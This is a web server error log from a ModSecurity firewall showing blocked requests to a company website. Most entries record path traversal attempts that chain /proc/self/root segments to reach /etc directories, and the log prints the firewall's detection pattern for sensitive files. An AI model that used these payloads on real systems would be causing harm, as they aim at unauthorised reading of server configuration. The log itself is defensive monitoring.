[Thu Mar 19 04:51:50.693358 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:60538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburFuoXxyEfFpUF8f_gRQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:50.937863 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:45524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburFgkwaGbbGflqUZCEjQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:52.013261 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:60540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburGAbLMZ6AikZjR9UtGQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:53.376108 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:60552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburGRkFeYa1D6dYQnC9_wAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:54.499695 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:48828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburGgbLMZ6AikZjR9UtHAAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:51:54.674802 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:60564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburGuoXxyEfFpUF8f_gSAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:56.006972 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.243.128:60578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburHAbLMZ6AikZjR9UtHgAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:59.579877 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:60580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburHgbLMZ6AikZjR9UtJAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:01.639160 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:36192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburIRkFeYa1D6dYQnC-CgAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:02.991081 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.241.31:48834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburIv-YZRR_7pZ7nDJdEwAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:04.427507 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:55338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburJOyqAr6etmhZHNozfAAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:05.847036 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:55350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburJfu8EFLIOrSqIptt3gAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:06.673080 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:36196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburJvu8EFLIOrSqIptt3wAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:07.163755 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:55364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburJ8df6f5d65gmYZRDNAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:52:09.799614 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:53902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburKf-YZRR_7pZ7nDJdJgAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:10.296529 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.243.128:36210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburKl_V7PWP6ixUYl6L2AAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:11.659545 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:35840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburKwkwaGbbGflqUZCEoAAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:13.041066 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:35854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburLcdf6f5d65gmYZRDPAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:14.395578 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:35870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburLuoXxyEfFpUF8f_gVQAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:15.095544 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.244.43:60322] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aburL1_V7PWP6ixUYl6L4AAAAok"]
[Thu Mar 19 04:52:15.766793 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:35876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburL8df6f5d65gmYZRDQQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:18.273926 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.243.128:35892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburMl_V7PWP6ixUYl6L5gAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
